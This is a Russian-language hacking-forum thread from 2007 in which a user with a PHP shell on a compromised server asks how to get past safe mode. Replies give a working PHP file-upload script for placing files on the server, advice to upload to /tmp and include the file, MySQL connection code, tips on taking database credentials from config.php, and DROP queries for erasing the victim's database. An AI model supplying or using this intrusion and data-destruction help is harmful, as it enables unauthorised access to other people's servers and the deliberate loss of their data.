Помощь с PHP Кодом

Discussion in 'Песочница' started by antiforum, 11 Jan 2007.

Thread Status:
Not open for further replies.
  1. antiforum

    antiforum New Member

    Joined:
    21 Nov 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Продолжение истории с шеллом:
    http://forum.antichat.ru/thread31056.html

    Что бы не оффтопить в той теме - открываю еще одну.

    Я потестил - там файлы не заливаются, скорей всего потому что включен safe mode - on.

    Т.е. все что я могу - это выполнять код php.

    Посоветуйте что можно сделать в таких условиях.
     
    #1 antiforum, 11 Jan 2007
    1 person likes this.
  2. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    т.е чтобы не оффтопить в одной теме, ты решил оффтопить в двух. Оригинально
     
    #2 Constantine, 11 Jan 2007
    2 people like this.
  3. genom--

    genom-- Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    668
    Likes Received:
    416
    Reputations:
    288
    а написать код на php которые записывает файл и таким образом его залить на серв нельзя да =)
     
    #3 genom--, 11 Jan 2007
  4. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    Вот код:
    Code:
    <?php
set_time_limit(0);
echo <<<HTML
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<center><b><font color=red> Загругзка файла на сервер </font></b><center>  <br>
<tr>
<td><b>File:</td>
<td><input size="48" name="file" type="file"></td>
</tr>
<tr>
<td>Path:</b></td>
<td><input size="48" name="path" type="text"><input type="submit" value="OK"></td><br>
HTML;

if (isset($_POST['path'])){

$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "OK $uploadfile\n";
    echo "Name:" .$_FILES['file']['name']. "\n";
    echo "Ves:" .$_FILES['file']['size']. "\n";

} else {
    print "Error:\n";
    print_r($_FILES);
}
}
?>
     
    #4 p-range, 11 Jan 2007
  5. EXSlim

    EXSlim Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    73
    Likes Received:
    20
    Reputations:
    18
    ->Я потестил - там файлы не заливаются, скорей всего потому что включен safe mode - on.

    cd /tmp
    Туда и заливай.
     
    #5 EXSlim, 12 Jan 2007
  6. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    потом include("/tmp/file.php");
     
    #6 p-range, 12 Jan 2007
  7. antiforum

    antiforum New Member

    Joined:
    21 Nov 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Ребята спасибо за ответы, буду разгребать.

    Еще, у меня есть данные от базы данных, а так как шелл находится на локалхосте - то я могу без проблем к нему подключится....

    Можно ли средствами php, подключисвшись к базе - стереть ее допустим?
     
    #7 antiforum, 12 Jan 2007
  8. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    Можно, необходимо знать логин и пароль для подключения. Обычно подключения из вне запрещены.
    Code:
    $host = "localhost"; // место расположения MySql
 $db_name = "grol"; // имя базы
 $db_user = "grol"; // пользователь базы
 $db_password = "admin"; // пароль пользователя
 $table_online = "online"; // имя таблицы
 // соединяемся с MySQL и выбираем нужную базу
 mysql_connect($host,$db_user,$db_password) or die(mysql_error());
 mysql_select_db($db_name) or die(mysql_error())
//http://phpfaq.ru/mysql
     
    _________________________
    #8 ettee, 12 Jan 2007
  9. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    логин и пароль соответственно ищи в файлах типа config.php движка который ее использует.
     
    #9 Abra, 12 Jan 2007
  10. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    ettee прав ) соединяешься с бд, а потом с помощью

    mysql_query("ЗАПРОС"); делаешь в бд что хочешь )

    например удалить таблицу

    mysql_query("DROP название таблицы");

    и тд
     
    #10 darky, 12 Jan 2007
  11. antiforum

    antiforum New Member

    Joined:
    21 Nov 2006
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Всем спасибо за помощь.
     
    #11 antiforum, 13 Jan 2007
  12. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Ну значит закрыто.
     
    #12 m0nzt3r, 13 Jan 2007
(You must log in or sign up to post here.)
Loading...
Similar Threads - Помощь Кодом
  1. raarkil

    брут пин-кода

    raarkil, 14 Apr 2023, in forum: Песочница
    Replies:
    4
    Views:
    6,177
    raarkil
    16 Apr 2023
  2. ilqar200

    нужна помощь в rce в django 2.2.8

    ilqar200, 25 Feb 2023, in forum: Песочница
    Replies:
    0
    Views:
    1,760
    ilqar200
    25 Feb 2023
  3. ilqar200

    нужна помощь в пентестинге внутри хостинга

    ilqar200, 8 Feb 2023, in forum: Песочница
    Replies:
    1
    Views:
    2,329
    fandor9
    7 Mar 2023
  4. Flashid

    Сжатие картинки с php-кодом

    Flashid, 18 Jan 2023, in forum: Песочница
    Replies:
    6
    Views:
    3,121
    Flashid
    19 Jan 2023
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.